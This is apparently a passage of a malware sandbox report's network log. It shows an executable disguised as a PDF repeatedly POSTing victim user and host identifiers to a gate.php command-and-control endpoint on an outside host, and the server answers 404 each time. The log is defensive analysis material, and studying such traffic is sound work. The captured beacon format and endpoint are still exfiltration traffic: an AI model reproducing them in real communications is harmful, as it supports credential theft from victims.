                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    200192.168.2.34993947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:50.701366901 CET4732OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:50.718123913 CET4732OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:50.762480021 CET4732INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    201192.168.2.34994147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:51.232876062 CET4738OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:51.249530077 CET4739OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:51.295295000 CET4739INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    202192.168.2.34994247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:51.745747089 CET4747OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:51.762674093 CET4747OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:51.805429935 CET4748INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    203192.168.2.34994447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:52.011532068 CET4749OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:52.028239965 CET4749OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:52.069458008 CET4750INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    204192.168.2.34994547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:52.540725946 CET4762OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:52.557657003 CET4762OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:52.673836946 CET4762INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    205192.168.2.34994647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:53.132189989 CET4763OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:53.149421930 CET4763OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:53.203316927 CET4764INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    206192.168.2.34994847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:53.741499901 CET4773OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:53.758150101 CET4773OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:53.800649881 CET4773INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    207192.168.2.34994947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:54.013312101 CET4774OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:54.030227900 CET4774OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:54.074157953 CET4775INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    208192.168.2.34995047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:54.573091984 CET4775OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:54.590130091 CET4776OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:54.632227898 CET4776INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    209192.168.2.34995147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:55.156588078 CET4777OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:55.173185110 CET4777OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:55.378946066 CET4780INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:12 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    21192.168.2.34973047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:38.586697102 CET94OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:38.603267908 CET94OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:38.645181894 CET95INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:55 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    210192.168.2.34995347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:55.853547096 CET4787OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:55.870115995 CET4788OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:55.913942099 CET4788INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:13 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    211192.168.2.34995447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:56.114180088 CET4789OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:56.131055117 CET4789OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:56.172661066 CET4789INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:13 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    212192.168.2.34995547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:56.633629084 CET4790OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:56.650320053 CET4790OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:56.693408966 CET4791INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:13 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    213192.168.2.34995647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:57.149827003 CET4792OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:57.166579962 CET4792OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:57.219338894 CET4792INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    214192.168.2.34995747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:57.692003012 CET4793OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:57.708869934 CET4793OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:57.753940105 CET4794INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    215192.168.2.34995847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:58.283328056 CET4794OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:58.300215960 CET4795OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:58.343101978 CET4795INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:15 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    216192.168.2.34995947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:58.547962904 CET4796OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:58.564587116 CET4796OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:58.604918957 CET4796INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:15 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    217192.168.2.34996047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:58.821964979 CET4797OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:58.838589907 CET4797OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:58.886666059 CET4798INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:16 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    218192.168.2.34996147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:59.097645998 CET4798OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
